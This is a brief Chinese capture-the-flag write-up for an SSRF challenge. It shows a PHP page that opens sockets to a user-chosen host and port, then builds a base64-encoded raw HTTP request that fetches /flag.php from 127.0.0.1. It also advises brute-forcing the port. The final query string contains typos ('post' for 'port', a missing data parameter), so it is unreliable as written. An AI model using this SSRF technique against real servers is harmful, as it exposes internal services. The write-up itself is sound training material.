[HNCTF 2022 WEEK2]ez_ssrf
知识点
SSRF注入。
解题
看到index.php界面
<?phphighlight_file(__FILE__);
error_reporting(0);$data=base64_decode($_GET['data']);
$host=$_GET['host'];
$port=$_GET['port'];$fp=fsockopen($host,intval($port),$error,$errstr,30);
if(!$fp) {die();
}
else {fwrite($fp,$data);while(!feof($data)){echo fgets($fp,128);}fclose($fp);
}
看到有三个参数可以传入
其中fsockopen()函数
语法
resource fsockopen($hostname,$port,$errno,$errster,$timeout)
host域名,
prot端口
errno当连接失败时输出错误码
errstr连接失败时,引用的变量设置为错误信息
timeout 返回时间,超过时间就返回。
看到fwrite()他将data中的内容传入我们所写的端口号和域名中
再通过循环
while(!feof($data)){echo fgets($fp,128);}
将每一行内容进行输出,每行最多输出128个字符。
我们传入内容。
data中的内容,我们构造一下
GET /flag.php HTTP/1.1\r\n
Host: 127.0.0.1\r\n
Connection: Close\r\n
\r\n
将其base64后传入
?host=127.0.0.1&post=10&R0VUIC9mbGFnLnBocCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBDbG9zZQ0KDQo=
不知道端口用bp爆破就行。
